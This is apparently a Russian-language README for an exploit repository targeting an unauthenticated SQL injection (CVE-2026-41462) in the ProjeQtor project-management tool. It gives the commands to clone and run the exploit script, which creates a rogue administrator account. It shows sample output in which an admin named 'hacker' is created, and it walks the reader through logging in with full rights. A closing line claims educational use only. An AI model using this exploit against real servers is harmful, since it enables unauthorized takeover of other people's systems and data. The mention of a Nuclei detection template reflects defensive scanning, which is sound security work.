
CVE-2026-41462
Критическая неаутентифицированная SQL-инъекция в ProjeQtor ≤ 12.4.3
CVE-2026-41462 — это критическая неаутентифицированная SQL-инъекция в функциональности входа в систему инструмента управления проектами ProjeQtor.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
При успешном выполнении эксплойта вы увидите вывод, похожий на этот:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
Откройте браузер и перейдите по адресу:
http://target.com/login.php
Войдите, используя учётные данные, показанные в выводе скрипта.
При успехе вы попадёте в административную панель ProjeQtor с полными правами администратора.
Признаки успеха:
| Файл | Описание |
|---|---|
CVE-2026-41462.py | Основной скрипт эксплуатации |
CVE-2026-41462.yaml | Шаблон обнаружения для Nuclei |
README.md | Эта документация |
Клонируйте репозиторий:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
Запустите эксплойт:
python3 CVE-2026-41462.py -u http://target.com --create-admin
Войдите с помощью только что созданной учётной записи администратора.
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование незаконно.